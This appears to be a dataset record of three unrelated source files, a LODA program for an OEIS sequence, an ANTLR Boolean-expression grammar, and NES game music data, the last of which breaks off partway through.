oeis/024/A024553.asm	neoneye/loda-programs	11	105195	; A024553: [ 1/{n*sqrt(5)} ], where {x} := x - [ x ]. ; Submitted by <NAME> ; 4,2,1,1,5,2,1,1,8,2,1,1,14,3,1,1,76,4,2,1,1,5,2,1,1,7,2,1,1,12,3,1,1,38,3,2,1,1,4,2,1,1,6,2,1,1,10,3,1,1,25,3,1,1,1,4,2,1,1,6,2,1,1,9,2,1,1,19,3,1,1,1,4,2,1,1,5,2,1,1,8,2,1,1,15,3,1,1,99,4,2,1,1,5,2,1,1,7,2,1 add $0,1 mov $1,$0 mul $0,2 pow $1,2 lpb $1 sub $1,$0 add $0,1 sub $1,$0 lpe mul $0,2 div $0,$1
src/main/antlr/lsck/combiner/expand/BooleanExpression.g4	Brinsky/LFSR-Stream-Cipher-Kit	2	7650	grammar BooleanExpression; @header{ package lsck.combiner.expand; } expr : expr expr # Product \| expr '+' expr # Sum \| VARIABLE+ # SimpleTerm \| CONSTANT # Constant \| '(' expr ')' # Parens ; VARIABLE : 'x' [0-9]+; CONSTANT : '0' \| '1'; WHITESPACE : (' ' \| '\t' \| '\r' \| '\n') -> skip ;
game/data/music/theme_adventure.asm	sgadrat/super-tilt-bro	91	26129	<reponame>sgadrat/super-tilt-bro music_adventure_bank = CURRENT_BANK_NUMBER music_adventure_info: .word music_adventure_track_pulse1 .word music_adventure_track_pulse2 .word music_adventure_track_triangle .word music_adventure_track_noise .byt 0 music_adventure_track_pulse1: .word music_adventure_sample_120 .word music_adventure_sample_119 .word music_adventure_sample_121 .word music_adventure_sample_119 .word music_adventure_sample_122 .word music_adventure_sample_120 .word music_adventure_sample_119 .word music_adventure_sample_121 .word music_adventure_sample_119 .word music_adventure_sample_123 .word music_adventure_sample_0 .word music_adventure_sample_1 .word music_adventure_sample_2 .word music_adventure_sample_3 .word music_adventure_sample_16 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_18 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_19 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_20 .word music_adventure_sample_21 .word music_adventure_sample_15 .word music_adventure_sample_22 .word music_adventure_sample_15 .word music_adventure_sample_23 .word music_adventure_sample_21 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_24 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_25 .word music_adventure_sample_15 .word music_adventure_sample_26 .word music_adventure_sample_27 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_28 .word music_adventure_sample_15 .word music_adventure_sample_29 .word music_adventure_sample_114 .word music_adventure_sample_115 .word music_adventure_sample_114 .word music_adventure_sample_116 .word music_adventure_sample_114 .word music_adventure_sample_117 .word music_adventure_sample_114 .word music_adventure_sample_118 .word music_adventure_sample_99 .word music_adventure_sample_100 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_30 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_31 .word music_adventure_sample_99 .word music_adventure_sample_101 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_32 .word music_adventure_sample_15 .word music_adventure_sample_33 .word music_adventure_sample_99 .word music_adventure_sample_102 .word music_adventure_sample_15 .word music_adventure_sample_17 .word music_adventure_sample_15 .word music_adventure_sample_34 .word music_adventure_sample_15 .word music_adventure_sample_35 .word music_adventure_sample_99 .word music_adventure_sample_103 .word music_adventure_sample_15 .word music_adventure_sample_36 .word music_adventure_sample_15 .word music_adventure_sample_37 .word music_adventure_sample_4 .word music_adventure_sample_5 .word music_adventure_sample_4 .word music_adventure_sample_6 .word music_adventure_sample_67 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_68 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_10 .word music_adventure_sample_69 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_68 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_10 .word music_adventure_sample_67 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_68 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_11 .word music_adventure_sample_62 .word music_adventure_sample_61 .word music_adventure_sample_63 .word music_adventure_sample_61 .word music_adventure_sample_64 .word music_adventure_sample_61 .word music_adventure_sample_65 .word music_adventure_sample_61 .word music_adventure_sample_66 MUSIC_END music_adventure_track_pulse2: .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_7 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_110 .word music_adventure_sample_124 .word music_adventure_sample_125 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_7 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_110 .word music_adventure_sample_124 .word music_adventure_sample_125 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_7 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_110 .word music_adventure_sample_124 .word music_adventure_sample_125 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_7 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_7 .word music_adventure_sample_83 .word music_adventure_sample_82 .word music_adventure_sample_84 .word music_adventure_sample_82 .word music_adventure_sample_85 .word music_adventure_sample_82 .word music_adventure_sample_86 .word music_adventure_sample_82 .word music_adventure_sample_87 .word music_adventure_sample_82 .word music_adventure_sample_88 .word music_adventure_sample_82 .word music_adventure_sample_89 .word music_adventure_sample_82 .word music_adventure_sample_90 .word music_adventure_sample_82 .word music_adventure_sample_91 .word music_adventure_sample_82 .word music_adventure_sample_86 .word music_adventure_sample_82 .word music_adventure_sample_87 .word music_adventure_sample_82 .word music_adventure_sample_88 .word music_adventure_sample_82 .word music_adventure_sample_83 .word music_adventure_sample_82 .word music_adventure_sample_84 .word music_adventure_sample_82 .word music_adventure_sample_85 .word music_adventure_sample_82 .word music_adventure_sample_86 .word music_adventure_sample_82 .word music_adventure_sample_87 .word music_adventure_sample_82 .word music_adventure_sample_88 .word music_adventure_sample_82 .word music_adventure_sample_89 .word music_adventure_sample_82 .word music_adventure_sample_90 .word music_adventure_sample_82 .word music_adventure_sample_91 .word music_adventure_sample_82 .word music_adventure_sample_86 .word music_adventure_sample_82 .word music_adventure_sample_87 .word music_adventure_sample_82 .word music_adventure_sample_92 .word music_adventure_sample_62 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_70 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_10 .word music_adventure_sample_71 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_129 .word music_adventure_sample_63 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_10 .word music_adventure_sample_62 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_70 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_10 .word music_adventure_sample_72 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_73 .word music_adventure_sample_61 .word music_adventure_sample_9 .word music_adventure_sample_10 .word music_adventure_sample_128 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_7 .word music_adventure_sample_83 .word music_adventure_sample_127 .word music_adventure_sample_110 .word music_adventure_sample_110 .word music_adventure_sample_124 .word music_adventure_sample_126 MUSIC_END music_adventure_track_triangle: .word music_adventure_sample_74 .word music_adventure_sample_75 .word music_adventure_sample_74 .word music_adventure_sample_76 .word music_adventure_sample_74 .word music_adventure_sample_75 .word music_adventure_sample_104 .word music_adventure_sample_105 .word music_adventure_sample_39 .word music_adventure_sample_38 .word music_adventure_sample_40 .word music_adventure_sample_41 .word music_adventure_sample_38 .word music_adventure_sample_42 .word music_adventure_sample_38 .word music_adventure_sample_43 .word music_adventure_sample_38 .word music_adventure_sample_44 .word music_adventure_sample_41 .word music_adventure_sample_38 .word music_adventure_sample_40 .word music_adventure_sample_38 .word music_adventure_sample_45 .word music_adventure_sample_38 .word music_adventure_sample_46 .word music_adventure_sample_39 .word music_adventure_sample_38 .word music_adventure_sample_40 .word music_adventure_sample_41 .word music_adventure_sample_38 .word music_adventure_sample_42 .word music_adventure_sample_38 .word music_adventure_sample_43 .word music_adventure_sample_38 .word music_adventure_sample_44 .word music_adventure_sample_41 .word music_adventure_sample_38 .word music_adventure_sample_40 .word music_adventure_sample_38 .word music_adventure_sample_45 .word music_adventure_sample_38 .word music_adventure_sample_46 .word music_adventure_sample_93 .word music_adventure_sample_94 .word music_adventure_sample_93 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_8 .word music_adventure_sample_93 .word music_adventure_sample_94 .word music_adventure_sample_93 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_8 .word music_adventure_sample_93 .word music_adventure_sample_94 .word music_adventure_sample_93 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_8 .word music_adventure_sample_93 .word music_adventure_sample_94 .word music_adventure_sample_93 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_38 .word music_adventure_sample_47 .word music_adventure_sample_8 .word music_adventure_sample_48 .word music_adventure_sample_38 .word music_adventure_sample_49 .word music_adventure_sample_38 .word music_adventure_sample_50 .word music_adventure_sample_38 .word music_adventure_sample_44 .word music_adventure_sample_51 .word music_adventure_sample_38 .word music_adventure_sample_52 .word music_adventure_sample_38 .word music_adventure_sample_53 .word music_adventure_sample_38 .word music_adventure_sample_49 .word music_adventure_sample_48 .word music_adventure_sample_38 .word music_adventure_sample_49 .word music_adventure_sample_38 .word music_adventure_sample_50 .word music_adventure_sample_38 .word music_adventure_sample_44 .word music_adventure_sample_51 .word music_adventure_sample_38 .word music_adventure_sample_54 .word music_adventure_sample_38 .word music_adventure_sample_55 .word music_adventure_sample_38 .word music_adventure_sample_56 .word music_adventure_sample_74 .word music_adventure_sample_75 .word music_adventure_sample_74 .word music_adventure_sample_76 .word music_adventure_sample_74 .word music_adventure_sample_75 .word music_adventure_sample_104 .word music_adventure_sample_106 MUSIC_END music_adventure_track_noise: .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_97 .word music_adventure_sample_95 .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_97 .word music_adventure_sample_95 .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_97 .word music_adventure_sample_95 .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_98 .word music_adventure_sample_57 .word music_adventure_sample_14 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_79 .word music_adventure_sample_77 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_79 .word music_adventure_sample_77 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_80 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_81 .word music_adventure_sample_57 .word music_adventure_sample_58 .word music_adventure_sample_57 .word music_adventure_sample_14 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_79 .word music_adventure_sample_77 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_79 .word music_adventure_sample_77 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_80 .word music_adventure_sample_57 .word music_adventure_sample_78 .word music_adventure_sample_77 .word music_adventure_sample_81 .word music_adventure_sample_57 .word music_adventure_sample_58 .word music_adventure_sample_57 .word music_adventure_sample_14 .word music_adventure_sample_57 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_14 .word music_adventure_sample_12 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_14 .word music_adventure_sample_12 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_14 .word music_adventure_sample_12 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_60 .word music_adventure_sample_57 .word music_adventure_sample_14 .word music_adventure_sample_57 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_14 .word music_adventure_sample_12 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_14 .word music_adventure_sample_12 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_14 .word music_adventure_sample_12 .word music_adventure_sample_13 .word music_adventure_sample_12 .word music_adventure_sample_60 .word music_adventure_sample_57 .word music_adventure_sample_14 .word music_adventure_sample_57 .word music_adventure_sample_112 .word music_adventure_sample_111 .word music_adventure_sample_107 .word music_adventure_sample_108 .word music_adventure_sample_113 .word music_adventure_sample_111 .word music_adventure_sample_107 .word music_adventure_sample_109 .word music_adventure_sample_57 .word music_adventure_sample_14 .word music_adventure_sample_57 .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_97 .word music_adventure_sample_95 .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_97 .word music_adventure_sample_95 .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_97 .word music_adventure_sample_95 .word music_adventure_sample_96 .word music_adventure_sample_95 .word music_adventure_sample_98 .word music_adventure_sample_57 .word music_adventure_sample_59 MUSIC_END music_adventure_sample_0: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(41,1,2,9,0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(2,10,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(51,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(2,10,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(50,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(2) CHAN_VOLUME_HIGH(1) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(2) CHAN_VOLUME_HIGH(1) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(2,10,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(1) SAMPLE_END .) music_adventure_sample_1: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(41,1,2,9,0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(1,10,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) SAMPLE_END .) music_adventure_sample_2: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(41,1,2,9,0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(2,10,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(53,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(56,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(2,10,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(58,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(53,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(2) CHAN_VOLUME_HIGH(1) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(2) CHAN_VOLUME_HIGH(1) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(53,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) SAMPLE_END .) music_adventure_sample_3: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(55,1,2,9,0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(56,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(55,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(53,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(51,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(2,10,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) 